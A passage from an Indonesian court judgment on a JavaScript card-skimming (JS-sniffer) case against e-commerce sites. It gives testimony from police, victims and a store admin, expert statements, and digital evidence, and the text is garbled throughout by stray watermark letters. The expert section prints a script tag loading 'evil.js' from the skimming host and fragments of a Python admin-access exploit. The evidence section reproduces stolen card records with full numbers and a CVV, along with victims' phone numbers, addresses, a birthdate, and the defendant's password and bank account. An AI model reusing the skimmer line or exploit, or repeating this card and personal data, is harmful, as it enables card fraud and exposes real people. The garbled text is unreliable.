- Bahwa terdakwa melakukan perbuatannya tersebut tanpa sepengetahuan dan

M
ng
tanpa ijin dari pemilik kartu kredit dan tanpa ijin pihak yang berwenang.
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa saksi membenarkan barang bukti yang diperlihatkan di persidangan.
R
Terhadap keterangan saksi, terdakwa menyatakan benar dan tidak ada keberatan;
si
Saksi 2. Vebrian Adhi Pratama, S.Kom., dibawah sumpah / janji* pada pokoknya
ne
ng
menerangkan sebagai berikut:
- Bahwa saksi bertugas di Direktorat Tindak Pidana Siber Bareskrim Polri.
- Bahwa Direktorat Tindak Pidana Siber Bareskrim Polri mendapat laporan dari
do
gu INTERPOL Inggris bahwa telah ada tindak pidana yang berkaitan dengan ITE yang
berasal dari Indonesia. Kemudian berdasarkan laporan tersebut, saksi beserta tim
In
A
melakukan penyelidikan sehingga ditemukan hasil ada beberapa pelaku di
Indonesia yang melakukan intersepsi atau penyadapan dan pencurian data kartu
ah
kredit, yang salah satu pelaku tersebut adalah Terdakwa Ardiansyah.
lik
- Bahwa antara terdakwa Ardiansyah dan pelaku lainnya saling kenal namun
perbuatan terdakwa Ardiansyah tidak ada hubungannya dengan perbuatan pelaku
am
ub
lainnya.
- Bahwa pada tahun 2017 s/d awal 2020 bertempat di tempat terdakwa di Singosari
ep
Ds. Jombor Baru No.03 Sinduadi Mlati Kab. Sleman DIY, pemilik domain website
k
www.rest-api.web.id telah melakukan akses ilegal terhadap website e-commerce

ah
yang ada di berbagai negara dengan menggunakan malware (virus) sehingga data
R
si
pribadi kartu kredit pembeli yang telah mengakses website e-commerce tersebut
juga didapat oleh pemilik domain website www.rest-api.web.id.
ne
ng
- Bahwa Interpol telah melakukan identifikasi dan pengambilan sampel dari berbagai
sumber yang terkait dengan situs web e-commerce yang berpotensi terinfeksi dan
do
gu
secara infrastruktur milik penjahat/hacker sebagai CnC (Command and Center)

Mallware JS-SNIFFER.
- Bahwa beberapa website yang berfungsi sebagai CnC ada di Indonesia dan
In
A
beberapa website e-commerce sebagai korban ada di USA, Hongkong.

- Bahwa penyelidikan yang dilakukan tim Penyidik adalah dengan membuka log file
ah
lik
beberapa website e-commerce yang telah diakses illegal, sampai menemukan

alamat website www.rest-api.web.id
m
ub
- Bahwa kemudian tim juga mencoba mengidentifikasi domain dari alamat website
www.rest-api.web.id, sampai menemukan informasi terdakwa Ardiansyah dengan
ka
alamat email pakhaxor09999@gmail.com, tempat tinggal Jalan Hos Cokroaminoto

ep
Nomor 34 Yogyakarta, Indonesia dan nomor telepon seluler 082136515813.

ah
- Bahwa alamat website www.rest-api.web.id didaftarkan pada jasa layanan internet

R
(layanan hos web) Jogja Camp dengan identitas pendaftar Ardiansyah sebagai
es
pemilik domain.
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa untuk mengetahui apakah alamat website dimaksud telah mengirimkan
R
malware (virus) kepada beberapa e-commerce, tim mencoba mengakses website
si
dimaksud dengan menggunakan PC yang dilengkapi program antivirus Kaspersky
ne
ng
yang dirancang untuk melindungi pengguna dari malware (virus) dan ternyata
benar program tersebut mendeteksi adanya malware pada alamat website
dimaksud dan ketika diakses menggunakan komputer lain, website tersebut sudah
do
gu tidak dapat diakses.
- Bahwa berdasarkan logfile diketahui juga ketika pemilik domain website www.rest-
In
A
api.web.id mengakses beberapa e-commerce, ada data yang masuk kembali
kepada alamat website www.rest-api.web.id.
ah
- Bahwa atas untuk kode program, malware yang digunakan pelaku kepada
lik
beberapa website e-commerce, menyebabkan terjadi pencurian data / informasi
elektronik terbukti dengan data yang terkirim ke website pelaku dan hal itu
am
ub
merupakan hal yang illegal.
- Bahwa cara terdakwa melakukan tindak pidana tersebut adalah dengan mengelola
ep
website www.rest-api.web.id yang mengirimkan malware dengan script tertentu ke
k
beberapa website e-commerde di berbagai Negara sehingga website e-commerce

ah
yang menjadi korban tersebut akan terinfeksi malware yang dikirim oleh terdakwa
R
si
dan beberapa data dari website e-commerce tersebut terkirim ke website www.rest-
api.web.id.
ne
ng
- Bahwa data yang diambil atau dipindahkan oleh terdakwa dengan cara tersebut ke
website milik terdakwa adalah data pemilik kartu kredit berupa nama pemilik kartu
do
gu
kredit, nomor kartu kredit, alamat, jenis kartu kredit, alamat email dan data-data
lainnya.
- Bahwa data-data yang diambil oleh terdakwa tersebut antara lain data milik Edward
In
A
Kang yang terdakwa peroleh dari website e-commerce

http://www.fullthrottlespeed.com dan data milik Ida Bagus Surya Manuaba.
ah
lik
- Bahwa selain mengambil atau memindahkan data kartu kredit milik Edward Kang
dan Ida Bagus Surya Manuaba, terdakwa juga melakukan pembelian online
m
ub
menggunakan data kartu kredit milik Edward Kang untuk membeli 1 buah laptop
alienware seharga Rp. 19.600.000,-.
ka
- Bahwa ada sekitar ratusan data kartu kredit yang telah diambil oleh terdakwa yang
ep
masuk ke dalam website www.rest-api.web.id.

ah
- Bahwa data-data kartu kredit tersebut ada yang terdakwa jual dan ada yang
R
terdakwa gunakan untuk pembelian online.

es
- Bahwa terdakwa melakukan perbuatannya tersebut tanpa sepengetahuan dan

M
ng
tanpa ijin dari pemilik kartu kredit dan tanpa ijin pihak yang berwenang.
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa saksi membenarkan barang bukti yang diperlihatkan di persidangan.
R
si
Saksi 3. Edward Kang, yang dibacakan di persidangan pada pokoknya sebagai
ne
ng
berikut:
- Bahwa pekerjaan saksi sehari-hari adalah programer sejak tahun 2010 sampai
dengan sekarang
do
gu - Bahwa data pembayaran kartu kredit milik saksi pribadi dengan nomor kartu kredit
379251671631002. Jenis kartu kredit saksi tersebut adalah kartu kredit AE
In
A
(American Expres) yang saksi gunakan sampai bulan Oktober 2023.
- Bahwa Kartu kredit AE (American Expres) dikeluarkan dari Bank yang berada di
ah
Amerika. Saksi menggunakan jenis kartu tersebut sejak tahun 2017. Selain hal
lik
tersebut Saksi juga memiliki akun paypal.
- Bahwa saksi sering melakukan pembelian barang dengan menggunakan kartu
am
ub
kredit 379251671631002 milik Saksi ke beberapa online shop (E-Commerce) salah
satunya pada e-commerce dengan alamat website http://www.fullthrottlespeed.com
ep
yang menjual onderdil mobil dan asesoris mobil.
k
- Bahwa data kartu kredit milik Saksi telah dicuri oleh pelaku setelah penyidik
ah
memperlihatkan data-data kartu kredit tersebut diatas dan salah satunya adalah
R
si
data kartu kredit milik Saksi.
- Bahwa seingat Saksi pada awal bulan Oktober 2018 (tanggalnya Saksi lupa) Saksi
ne
ng
menerima tagihan dari kartu kredit yang Saksi miliki berupa tagihan pembelian
Laptop Alienware 15.6 tahun 2018 sebesar USD 1400 bila dirupiahkan sebesar Rp.
do
gu
19.600.000 (Sembilan belas juta enam ratus ribu rupiah). Kejadian itu saksi alami
setelah Saksi terakhir mengunjungi website e-commerce
http://www.fullthrottlespeed.com.
In
A
- Bahwa saksi tidak mengetahui apakah data kartu kredit Saksi tersimpan di
database command center (C2C) website www.clasicfitmen.com yang Saksi
ah
lik
ketahui bahwa kartu kredit Saksi dicuri/diambil oleh pelaku/hacker dan dipakai oleh
tersangka untuk belanja sebuah laptop Alienware 15.6 tahun 2018.
m
ub
- Bahwa saksi sempat melakukan komplain kepada E-Commerce (online shop)

website http://www.fullthrottlespeed.com. Dan pemilik website tersebut sudah
ka
meminta maaf kepada Saksi karena sistem mereka telah diretas oleh seseorang
ep
(hacker) sehingga data pembayaran kartu kredit milik Saksi telah diambil alih/dicuri
ah
oleh hacker.
R
- Bahwa Saksi tidak meminta ganti rugi kejadian tersebut dan Saksi hanya meminta
es
kepada pemilik website http://www.fullthrottlespeed.com untuk memperbaiki sistem

M
ng
keamanannya untuk tidak terulang dikemudian hari.

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa kerugian yang Saksi alami setelah pelaku/hacker mencuri data pembayaran
R
kartu kredit milik Saksi adalah uang sebesar USD 1400 bila dirupiahkan sebesar
si
Rp. 19.600.000 (Sembilan belas juta enam ratus ribu rupiah).
ne
ng
- Bahwa bukti pembayaran dan informasi pembelian barang dengan menggunakan
kartu kredit milik Saksi, tidak bisa Saksi berikan karena kejadian tersebut sudah
lama dan Saksi tidak menyimpannya lagi.
do
gu - Bahwa saksi sudah menutup kartu kredit Saksi AE (American Expres) pada akhir
bulan Oktober 2018 setelah Saksi mengetahui bahwa kartu kredit Saksi dicuri oleh
In
A
pelaku/hacker dengan membeli 1 buah laptop Alienware 15.6 tahun 2018.
Terhadap keterangan saksi, terdakwa memberikan tanggapan sebagai berikut :
ah
- Bahwa paket pesanan berupa 1 buah laptop Alienware 15.6 tahun 2018 tersebut
lik
tidak pernah sampai ke tangan terdakwa.
Saksi 4. Caroline Ann Ford, yang dibacakan di persidangan pada pokoknya sebagai
am
ub
berikut:
- Bahwa saksi bekerja pada perusahaan E-Commerce
ep
http://www.fullthrottlespeed.com yang berada di USA sejak tahun 2015, adapun
k
tugas dan tanggung jawab Saksi adalah sebagai admin di website

ah
http://www.fullthrottlespeed.com yang mengontrol.

R
si
- Bahwa perusahaan E-Commerce http://www.fullthrottlespeed.com melayani jual
beli barang onderdil mobil dan asesoris mobil melalui website
ne
ng
- Bahwa pembelian dan pembayaran pelanggan cukup mengakses website:
do
gu
http://www.fullthrottlespeed.com selanjutnya pembeli memilih barang yang akan

dibeli kemudian membayar dengan metode pembayaran menggunakan transfer
atau kartu kredit.
In
A
- Bahwa setelah pembeli melakukan transaksi, selanjutnya barang akan dikirim

sesuai alamat yang disertakan oleh pembeli.
ah
lik
- Bahwa benar setiap customer melakukan pembelian produk di website

http://www.fullthrottlespeed.com akan tercatat didalam Log File.
m
ub
- Bahwa benar pada awal bulan Oktober 2018 (tanggalnya Saksi lupa) terdapat
customer yang melakukan komplain terhadapat kartu kreditnya yang di curi, yaitu
ka
sdr EDWARD KANG dimana kartu kedit miliknya di curi oleh pelaku/hacker setelah
ep
korban melakukan pembelian/transaksi barang dengan menggunakan kartu kredit

ah
korban.
R
- Bahwa setelah perusahaan fullthrottlespeed menerima komplain dari salah satu

es
customer, kami melakukan analisa terhadap Log File website

M
ng
http://www.fullthrottlespeed.com dan didapatkan bahwa dari hasil Log File tersebut

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
ada website www.rest-api.web.id yang mengakses masuk kedalam panel kontrol
R
layanan hos web yang memberikan tampilan grafis dan peralatan automasi untuk
si
memudahkan proses hosting pada situs web kami (cPanel). cPanel milik website
ne
ng
http://www.fullthrottlespeed.com dengan IP Address yang kami cek berada di
Indonesia pada sekitar bulan September 2018. Dimana kami pastikan bahwa IP
Addres tersebut yang melakukan Ilegal Akses ke website
do
gu http://www.fullthrottlespeed.com.
- Bahwa kemudian Saksi mulai mencari didalam Cpanel
In
A
http://www.fullthrottlespeed.com untuk mencari dengan cara apa pelaku/hacker
mencuri atau memindahkan data-data customer kartu kredit.
ah
- Bahwa saksi menemukan script yang berisi Mallware didalam halaman
lik
pembayaran, script tersebut yang memerintahkan data kartu kredit milik customer
yang sudah diinput/submit di website http://www.fullthrottlespeed.com akan
am
ub
berpindah secara otomatis ke website www.rest-api.web.id.
- Bahwa kerugian yang ditimbulkan pelaku/hacker melakukan illegal akses terhadap
ep
website http://www.fullthrottlespeed.com adalah menimbulkan ketidak percayaan
k
kepada costumer untuk melakukan pembelian produk kami yaitu website

ah
R
si
Saksi 5. Ida Bagus Surya Manuaba, yang dibacakan di persidangan pada pokoknya
ne
ng
sebagai berikut:
- Bahwa Saksi menggunakan kartu kredit sejak tahun 2018.
do
gu
- Bahwa cara Saksi menggunakan kartu kredit tersebut adalah dengan cara
menggunakan langsung melalui mesin ADC saat melakukan transaksi dan ada
juga Saksi pergunakan melalui pemberian data kartu kredit dan paswordnya saat
In
A
melakukan transaksi pembelian online di Website E commers.

- Bahwa untuk kartu kredit tersebut Saksi pergunakan untuk pembelian barang baik
ah
lik
langsung maupun via Website ecommers. Karena kartu kredit tersebut sangat
membantu Saksi disaat Saksi lupa membawa kartu ATM.
m
ub
- Bahwa untuk tagihan kartu kredit milik Saksi tersebut tiap bulan sekitar Rp.
10.000.000 namun pernah tagihan Saksi agak besar yakni pada pertengah tahun
ka
2019 sekitar Rp. 15.000.000, karena biasanya 10 juta lebih.

ep
- Bahwa untuk media yang Saksi pergunakan saat melakukan transaksi pembelian
ah
barang menggunakan kartu kredit di website e-commerce tersebut adalah

R
menggunakan hp dan terkadang menggunakan laptop.

es
M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa tidak ada transaksi lain selain website e-commerce yang Saksi lakukan saat
R
transaki pembelian barang melalui online. Karena Saksi lebih mementingkan
si
keamanan sehingga hanya wesbite e commerce resmi yang Saksi kunjungi.
ne
ng
- Bahwa tidak ada pemberitahuan atau notifikasi dari penyedia Kartu Kredit
Mastercard perihal kemanan pasword ataupun perubahan data lainya sehingga
Saksi meyakini tidak ada masalah dengan kartu kredit Saksi. Justru Saksi kaget
do
gu ketika penyidik memperlihatkan data – data tersebut bahwa data kartu kredit milik
Saksi dicuri oleh pelaku/hacker setelah Saksi membeli di website E-commerce.
In
A
Menimbang, bahwa Penuntut Umum telah mengajukan bukti surat dari Ahli
ah
sebagai berikut:
lik
1. Ahli Ir. Setiyadi Yazid
- Bahwa Ahli berpendidikan terakhir doktoral dengan titel Ph.d dari Queen’s
am
ub
University, Canada Elec and Comp Eng pada tahun 1995.
- Bahwa saat ini ahli adalah Ketua Center for Cyber Security and Cryptography,
ep
Universitas Indonesia, yaitu lembaga kajian Cyber security di bawah Fakultas Ilmu
k
Komputer Universitas Indonesia

ah
- Bahwa ahli beberapa kali telah menerbitkan jurnal ilmiah anatar lain pada tahun
R
si
2015 dan 2017 terakhir dengan judul “Improving Data Quality Through Bid Data,
Study Case: Bid Data-Mobile Potitioning Data on Indonesia Tourism Statistic”
ne
ng
diterbitkan oleh IWBIS ahun 2017 serta “Mitigation Strategy for Sinkhole Attack on
WSN”, diterbitkan IWBIS 2017
do
gu
- Bahwa disamping itu kegiatan yang ada sinergi dengan bidang IT adalah mengikuti
Program Chair of ICACSIS (International Cenference on Advanced Computer
Science and Infromation System pada tahun 2013 dan 2019.
In
A
- Bahwa JS Sniffer adalah termasuk dalam kategori Web/ Online Skimming yaitu
suatu bentuk kejahatan siber dimana sebuah malware di injeksikan kepada sebuah
ah
lik
website untuk menjalankan aktifitas intersep data perbankan/transaksi keuangan

yang dimasukkan oleh pengguna website tersebut. JavaScript (JS) adalah salah
m
ub
satu bahasa pemrograman tingkat tinggi yang dinamis. Laporan yang dibuat pada
April 2019, menyebutkan bahwa sebuah malware baru yang dikenal dengan
ka
JavaScript- sniffers telah berhasil menginfeksi 2440 situs e-commerce di seluruh

ep
dunia. Malware ini dirancang untuk mencuri data pembayaran pelanggan dari toko
ah
online. JS-sniffer adalah salah satu type malware yang diinjeksi oleh pelaku
R
kejahatan kepada website tertentu untuk melakukan intersep data yang

es
dimasukkan oleh user seperti: kartu kredit, username, password dll.

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa menurut riset dari Group-IB, pada tahun 2019 telah terdeteksi 38 varian dari
R
JavaScript sniffers. Menurut riset tersebut, 70% malware JS Script berjalan pada
si
platform (Content Management System) – CMS Magento, yaitu sebuah platform
ne
ng
open source untuk e-commerce yang dibangun menggunakan bahasa
pemrograman PHP. Hal yang mengkhawatirkan dari JS Sniffer adalah sulitnya
melakukan deteksi terinfeksinya sebuah website oleh JS Sniffer. Attack JS Sniffer
do
gu dapat dilakukan langsung kepada websitenya ataupun melalui library/plug in yang
digunakan yang berasal dari pihak ketiga. Kekhawatiran lainnya adalah terkait
In
A
dengan luasnya potensi pencurian data dari sebuah website e-commerce yang
telah terinfeksi. Melihat cara kerja dari JS Sniffer ini, menurut Grup IB sangat
ah
dimungkinkan terjadinya korban berantai, yaitu tidak hanya pengunjung situs saja
lik
namun juga perusahaan pemilik situs serta pihak perbankan yang menjadi mitra
transaksi pembayaran dari situs e-ecommerce tersebut juga berpotensi dicuri
am
ub
datanya. Hal ini mengingat banyaknya varian dari JSScript dengan cara kerja dan
kemampuan yang berbeda-beda.
ep
- Bahwa pada awal perkembangannya, JS Sniffer banyak mengarah pada aplikasi
k
Magecart yang diduga dikembangkan oleh oleh sebuah grup hacking yang memuat
ah
berbagai script untuk kepentingan berbagai aktivitas pembayaran/payment. Tanpa

R
si
sadar, pengguna script dari layanan Magecart tersebut akan langsung menjadi
target dari aktivitas sniffing perusahaan tersebut.
ne
ng
- Bahwa secara umum, terdapat 4 tahapan dari aktivitas JS Sniffer, yaitu:

Mendapatkan akses kepada website target Web dengan kerentanan (vulnerabilitas)
do
gu
yang rendah akan menjadi sasaran utama dari pelaku JS Sniffer, Mendapatkan
kode JS Sniffer, baik dengan cara melalukan koding sendiri ataupun membeli dari
forum, Melakukan instalasi/injeksi kode JS, Memanfaatkan (monetisasi) hasil
In
A
pencurian data yang didapat, baik dijual melalui forum underground ataupun
dimanfaatkan sendiri untuk pembelian barang-barang pada web e- ecomerce.
ah
lik
- Bahwa setelah mendapatkan autorisasi melalui channel website www.rest-

api.web.id terdapat sejumlah data-data kartu kredit.
m
ub
- Bahwa maksud dari bahasa pemorograman Java Script yang dilakukan oleh
tersangka adalah perintah yang berfungsi untuk mengcopy data-data
ka
pembelian/pembayaran dan mengirimkannya ke website www.rest-api.web.id.

ep

ah
R
es

M
ng

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
si
ne
ng
do
gu <script src='https://rest-api.web.id/evil.js'></script>
- Bahwa Script Pyton yang tersangka masukkan ke dalam website e-commerce
In
A
adalah bentuk perintah untuk mencari akses admin dari website yang diinginkan
yang setelah mendapatkan akses tersebut si pengguna akan memasukkan
ah
lik
malware.
import requests
import base64
import sys
am
ub

ep
k

ah

R
si
q="""
SET @SALT = 'rp';
ne
ng

do
gu

"""

In
A
#
ah
lik

Q",
m
ub
"forwarded": 1})
if r. ok:
ka
print "WORKED"
ep
else:
ah
2. Ahli Dr. RONNY, S. Kom., M.Kom., MH.

R
es
- Bahwa Ahli berpendidikan terakhir doktoral dengan titel doktor dari Universitas
M
Hasanuddin
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa saat ini ahli adalah dosen pada STIE Perbanas Surabaya
R
- Bahwa ahli pernah menjabat terakhir sebagai Kepala Bagian teknologi Informasi
si
dan Komunikasi STIE Perbanas Surabaya peridoe 2014-206
ne
ng
- Bahwa ahli juga mempunyai banyak pengalaman di bidang hukum ITE, baik
sebagai ahli pada uji konstitusional Undang-Undang Nomor 11 Tahun 2008 tentang
ITE pada tahun 2009, sebagai Narasumber penyusunan Peraturan Pemerintah
do
gu tentang Penyelenggaraan Sistem dan Transaksi Elektronik tahun 2010,
Narasumber Bimbingan Teknis Undang-Undang Nomor 11 Tahun 2008 tentang
In
A
ITE, tahun 2011 sampai dengan 2015 dan lain-lain.
- Bahwa yang dimaksud informasi elektronik adalah satu atau sekumpulan data
ah
elektronik, termasuk tapi tidak terbatas pada tulisan, suara, gambar, peta,
lik
rancangan, foto, electronic data interchange (EDI), surat elektronik, telegram,
teleks, telecopy atau sejenisnya, huruf, tanda, angka, kode akses, symbol atau
am
ub
perforasi yang telah diolah yang memiliki arti atau dapat dipahami oleh orang yang
mampu memahaminya.
ep
- Bahwa yang dimaksud dokumen elektronik adalah setiap informasi elektronik yang
k
dibuat, diteruskan, dikirimkan, diterima atau disimpan dalam bentuk analog, digital,
ah
elektromagnetik, optikal atau sejenisnya, yang dapat dilihat, ditampilkan dan atau
R
si
didengar melalui computer atau system elektronik, termasuk tetapi tidak terbatas
pada tulisan, suara, gambar, peta, rancangan, foto atau sejenisnya, huruf, tanda,
ne
ng
angka, kode akses, symbol atau perforasi yang memiliki makna atau arti atau dapat
dipahami oleh orang yang mampu memahaminya.
do
gu
- Bahwa yang dimaksud sistem elektronik adalah serangkaian perangkat dan

prosedur elektronik yang berfungsi mempersiapkan, mengumpulkan, mengolah,
menganalisis, menyimpan, menampilkan, mengumumkan, menganalisis dan atau
In
A
menyebarkan informasi.
- Bahwa berdasarkan kronologis yang disampaikan oleh penyidik bahwa perbuatan
ah
lik
tersangka Ardiansyah merupakan perbuatan yang dilakukan tanpa hak atau

melawan hokum melakukan perbuatan dengan menggunakan system elektronik
m
ub
dengan memperhatikan kronologis peristiwa bahwa :

- Bahwa tersangka Ardiansyah membuat dan mengelola website www.rest-
ka
api.web.id di penyedia jasa hosting Jogjacamp Indonesia.

ep
- Bahwa tersangka membuat dan memodifikasi script JS Sniffer yang dipergunakan

ah
untuk emndapatkan data-data kartu kredit.

R
- Bahwa script tersebut disimpan di website www.rest-api.web.id sehingga data-data

es
yang diinginkan terkirim ke website www.rest-api.web.id.

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa sebelum menyisipkan script tersebut tersangka mencari korban berupa
R
website e-commerce dengan cara melakukan scanning.
si
- Bahwa scanning dilakukan dengan cara mengirim script melalui VPS sehingga
ne
ng
akan mendapatkan data-data admin dari website e-commerce yang memiliki
kelemahan.
- Bahwa perbuatan tersangka Ardiansyah adalah perbuatan yang dilarang menurut
do
gu UU No. 19 Tahun 2016 tentang Perubahan atas UU Nomor 11 Tahun 2008 tentang
Informasi dan T ransaksi Elektronik, yang mencakup pemenuhan unsur pasal
In
A
sebagai berikut :
- Pasal 46 ayat (1) jo Pasal 30 ayat (1)
ah
lik
- Pasal 46 ayat (3) jo pasal 30 ayat (3)
- Pasal 47 jo pasal 31 ayat (1)
am
ub
ep
- Bahwa Tersangka melakukan scanning dengan cara mengirim script melalui
k
peladen pribadi virtual (Virtual Private Server) atau VPS, sehingga dapat
ah
mengakses data dari admin website e commerce yang memiliki kelemahan dan
R
si
perbuatan tersebut masuk ke dalam unsur pasal 30 ayat (1) UU ITE yaitu dengan
sengaja dan tanpa hak atau melawan hukum mengakses komputer dan/atau
ne
ng
sistem elektronik milik orang lain dengan cara apa pun, dimana tersangka
melakukan illegal akses dengan melakukan transaksi elektronik menggunakan
do
gu
kartu kredit korban secara tanpa hak

- Bahwa transaksi elektronik dengan menggunakan kartu kredit adalah merupakan
transaksi elektronik dengan sistem pengamanan, namun tersangka dapat
In
A
melanggar, menerobos, melampaui, atau menjebol sistem pengamanan transaksi

elektronik kartu kredit sehingga dimana tersangka melakukan scanning dengan
ah
lik
cara mengirim script melalui peladen pribadi virtual (Virtual Private Server) atau
VPS, sehingga dapat mengakses data dari admin website e commerce yang
m
ub
memiliki kelemahan kemudian menyisipkan modifikasi kode program (script) Js

Snifer untuk mendapatkan data-data kartu kredit korban
ka
- Bahwa melakukan perekaman atas informasi elektronik milik korban berupa data
ep
kartu kredit dalam bentuk file txt antara lain nomor kartu kredit, kata sandi, nama
ah
lengkap serta alamat, tanpa ijin korban maupun pengendali data pribadi korban
R
(website e-commerce) merupakan pelanggaran tindak pidana dengan sengaja dan

es
tanpa hak atau melawan hukum melakukan intersepsi atau penyadapan atas
M
ng
Informasi Elektronik dan/atau Dokumen Elektronik dalam suatu Komputer dan/atau

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
Sistem Elektronik tertentu milik Orang lain sebagaimana dimaksud pasal 31 ayat (1)
R
UU ITE.
si
- Bahwa perbuatan tersangka melakukan illegal akses dalam transaksi elektronik
ne
ng
dengan menggunakan kartu kredit korban tanpa hak dengan maksud untuk
melakukan transfer dana atau pemindahan informasi elektronik dengan
menggunakan kartu kredit korban dalam transaksi pembelian barang oleh
do
gu tersangka memenuhi unsur pasal dengan sengaja dan tanpa hak atau melawan
hukum dengan cara apa pun mengubah, menambah, mengurangi, melakukan
In
A
transmisi, merusak, menghilangkan, memindahkan, menyembunyikan suatu
Informasi Elektronik dan/atau Dokumen Elektronik milik Orang lain atau milik publik
ah
yang mengakibatkan terbukanya suatu Informasi Elektronik dan/atau Dokumen
lik
Elektronik yang bersifat rahasia menjadi dapat diakses oleh publik dengan
keutuhan data yang tidak sebagaimana mestinya. sebagaimana dimaksud pasal 32
am
ub
ayat (1) UU ITE
3. Bukti Digital Nomor Barang Bukti : 73-II-2020-SIBER., pada pokoknya
ep
menyimpulkan sebagai berikut :
k
- Pemeriksaan 73-II-2020-SIBER_01
ah
Ditemukan 30551 buah email yang berisi detai kartu kredit.

R
si
Ditemukan 76 buah email yang digunakan sebagai penampung informasi kartu
kredit.
ne
ng
Ditemukan file txt yang berisi catatan list website.

do
gu
Ditemukan 18850 email yang berisi detail kartu kredit, yang salah satunya milik
Ida Bagus Surya Manuaba
In
A
Sent: 28/1/2020 1:54:14 pm +0700

ah
lik
#--------------------------------[ 1 6 S H O P] -----------------------------#
#--------------------------------[ LOGIN DETAILS] -------------------------------#
#--------------------------------[ CARD DETAILS] -------------------------------#
m
ub

Level : WORLD
ka
CC Number : 5228460001070490
Expired : 02/2022
ep
CVV : 142
AMEX CID :
Sort Code :
ah
Credit Limit :
Copy : 5228460001070490|02|22|142
R
#--------------------------[ JAPAN INFO] -----------------------------#

WEB ID :
es
Card Password :
M

ng
Last Name : Manuaba

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
City : Denpasar
State : Bali
R
Country : Indonesia
si
Zip : 80235
BirthDay : 28/07/1973
Phone : 081236083110
ne
ng
ID Number :
Civil ID :
Qatar ID :
National ID :
Citizen ID :
do
Passport Number :
gu Bank Access Number
Social Insurance Number
Social Security Number
Account Number
:
:
:
:
OSID Number :
In
A
#--------------------------[ PC INFORMATION] --------------------------------#
IP Address : 36.85.246.149
Region : Bali
City : Denpasar
Continent : Asia
ah
lik
Date : 28 Jan, 2020, Time: 1:54 pm
am
ub
#--------------------------[ NEVER DIE ]-----------------------------#
ep
k
Ditemukan file.zip yang merupakan hasil export dari website “rest-api”
ah
R
Terdapat file “magentocc.txt” dan “result.txt” yang berisi detail kartu kredit, yang salah
si
satunya milik Edward Kang
ne
ng
billing[company]:
do
gu

billing[region]:
In
A
billing[fax]:
ah
lik
=================================================
billing_address_id:
m
ub
billing[company]:
ka

ep
billing[region]:
ah
billing[fax]:
R
es

M
ng
on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
payment[save]: 0
R
payment[save]: 1
si
ne
ng
Menimbang, bahwa Terdakwa di persidangan telah memberikan keterangan
yang pada pokoknya sebagai berikut:
do
- Bahwa terdakwa membenarkan keterangan dalam BAP.
gu - Bahwa Terdakwa pernah bekerja sebagai progammer;
- Bahwa terdakwa telah mengelola website www.rest-api.web.id pada tanggal 25
In
A
Nopember 2017 pada Idwebhost, dengan cara membeli domain tersebut secara
online melalui website www.idwebhost.com dengan harga paket domain dan
ah
lik
hosting sebesar Rp. 115.000,00 (seratus lima belas ribu rupiah) selama setahun.
- Bahwa terdakwa membayar pembelian domain dan hosting dengan cara
membayar melalui ebanking dari rekening pribadi terdakwa yaitu rekening bak BNI
am
ub
Nomor rekening 0407669924 atas nama ARDIANSYAH
- Bahwa setelah melakukan pembayaran, terdakwa mendapatkan panel kontrol
ep
layanan hos web atau dikenal dengan sebutan cPanel yang dibuat untuk
k
memudahkan proses hosting di situs web www.rest-api.web.id milik terdakwa,

ah
dengan username pakhaxor09999@gmail.com dan password Pakhaxor123

R
si
- Bahwa setelah website tersebut dihosting selama setahun, selanjutnya website
ne
www.rest-api.web.id dapat dipergunakan untuk terdakwa menampung data.
ng
- Bahwa semula, website itu hanya digunakan untuk menampung data saja dan hal
itu wajar bagi seorang progammer IT sebagaimana terdakwa, namun kemudian,
do
gu
setelah terdakwa mempelajari kode berbahaya yang dikenal sebagai JS sniffer,

sniffer JavaScript sebagai web/online skimming kartu kredit dan melakukan
In
penambahan atau modifikasi pada kode program (scrip) dengan menambahkan
A
scrip get biliing get payment dan terdakwa simpan dalam file manager cPanel
website terdakwa www.rest-api.web.id, maka terdakwa kemudian melakukan
ah
lik
scaning terhadap website toko online (e-commerce) yang memiliki kelemahan

vulnerabilitas yang rendah untuk dijadikan sasaran utama.
m
ub
- Bahwa scanning itu dilakukan terdakwa dengan cara login ke aplikasi kode
program (script) Peladen Pribadi Virtual, (Virtual private server) atau disingkat VPS
ka
dengan cara memasukkan IP Adress serta username dan password.

ep
- Bahwa terdakwa kemudian mencari domain web e-commerce untuk dimasukkan

ah
ke dalam kode program (script) “target”, dan sistem akan secara secara otomatis
R
melakukan scanning hingga e-commerce yang memiliki kerentanan keamanan

es
siber akan terlihat beserta username dan passwordnya, kemudian tersimpan pada
M
ng
aplikasi kode program VPS.

on

gu
d
In
A
Disclaimer
h
ik
am
u b
ep
hk
a
- Bahwa terdakwa kemudian memasukkan username dan password yang telah
R
disimpan untuk login ke website e commerce yang menjadi target kemudian
si
terdakwa menginjenksi, menyuntikkan atau menyusupkan kode program (script)
ne
ng
jahat yang bernama JS sniffer yang merupakan bentuk virus malware, untuk
menyusupi beberapa situs web toko online (e-commerce) dengan virus malware
sehingga terinfeksi. Kemudian kode program (script) JS sniffer akan melakukan
do
gu scanning.
- Bahwa kode JS Sniffer yang diinjeksi tersebut berfungsi sebagai katalis untuk
In
A
mencegat input pengguna di situs web toko online yang disusupi, dimana malware
tersebut akan mengkloning data pembeli website e-commerce yang menjadi target,
ah
sehingga secara otomatis data keuangan pengguna yang sensitif dan finansial
lik
berupa data pembayaran pelanggan dari toko online (intersep data
perbankan/transaksi keuangan yang dimasukkan oleh pengguna website), dalam
am
ub
bentuk txt kemudian dikodekan atau diterjemahkan dan dikirim ke ke dalam P-Code
dan ditampung dalam website terdakwa www.rest-api.web.id sehingga
ep
mengekstrak 400 (empat ratus) data informasi elektronik dari pengguna atau
k
